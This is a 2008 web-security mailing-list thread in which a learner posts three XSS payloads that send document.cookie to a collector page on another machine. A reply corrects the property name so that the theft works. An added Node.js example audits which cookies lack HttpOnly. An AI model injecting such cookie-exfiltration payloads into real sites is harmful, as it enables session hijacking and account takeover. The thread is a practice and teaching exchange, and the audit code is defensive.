[WEB SECURITY] XSS Help

romain r at fuckthespam.com
Thu Jun 5 10:53:55 EDT 2008


Well, the last one should work if you remove the 's' at cookies.
The variable is document.cookie.
Otherwise, document.cookie is a variable accessible from JS, not from HTML directly, which means
that if you write: <a href="document.cookie"> (close to your <script> stuff) it will
write 'document.cookie' in your address bar and not the content of it.

R.
   http://rgaucher.info

GsNaseer Gs wrote:
> Hi!
>
> I am new to this forum. I was practising to learn the concepts of
> XSS (Cross-Site Scripting). I am using two different applications on two
> different machines. I want to dump cookies of one application into
> another application's database. For that I am using
> this script to send cookies,
>
> <script
> src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+document.cookies>
>
> <script
> src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+escape(document.cookies)>
>
> <script>new
> Image().src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+encodeURI(document.cookies)</script>
>
> /*None of these scripts are working for me*/
>
> I am able to dump a blank record without any cookie values (null). I
> am trying this out on IE 7.
>
> Please, can anybody help me and guide me through where I am wrong?
>
> Thanks
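The reply above turns on the fact that document.cookie is a property that script reads, and that only cookies set without the HttpOnly attribute ever appear in it. The following is an added example, not code from this thread or from either poster: a small Node.js audit that parses Set-Cookie header values (the sample headers are constructed), reports which cookies injected script could read, and simulates what document.cookie would return for that set. The function names and the sample cookie names are assumptions for the demonstration.

```javascript
// Added example (not from the thread): which cookies end up readable through
// document.cookie? Only those set without HttpOnly. The headers below are
// constructed sample values, not captured from any real application.
const SAMPLE_SET_COOKIE_HEADERS = [
  "ASP.NET_SessionId=abc123; path=/",          // session cookie, no HttpOnly: script can read it
  "auth=tok; Path=/; HttpOnly; Secure",        // HttpOnly: never exposed to document.cookie
  "prefs=dark; Path=/; Max-Age=31536000",      // non-sensitive, readable by script
];

// Parse one Set-Cookie header value into name, value and the attribute flags we care about.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter((p) => p.length > 0);
  const eq = parts[0].indexOf("=");
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? "" : parts[0].slice(eq + 1);
  // Attribute names are case-insensitive; keep only the key part of "Key=Value" attributes.
  const attrs = new Set(parts.slice(1).map((p) => p.split("=")[0].trim().toLowerCase()));
  return { name, value, httpOnly: attrs.has("httponly"), secure: attrs.has("secure") };
}

// Audit: names of cookies that a script running in the page (including injected
// script) would be able to read, i.e. those lacking HttpOnly.
function scriptReadableCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => c.name);
}

// Simulate the browser side: document.cookie is the "name=value; name2=value2"
// string of the non-HttpOnly cookies only. An all-HttpOnly set yields "".
function simulateDocumentCookie(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

console.log("readable by script:", scriptReadableCookies(SAMPLE_SET_COOKIE_HEADERS));
console.log("document.cookie would be:", JSON.stringify(simulateDocumentCookie(SAMPLE_SET_COOKIE_HEADERS)));
```

Run it with `node` against your own application's Set-Cookie headers to see which cookies script can reach; a session cookie appearing in the readable list is the condition under which a document.cookie read from injected script has anything to carry away, and adding HttpOnly to that cookie removes it from the string.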
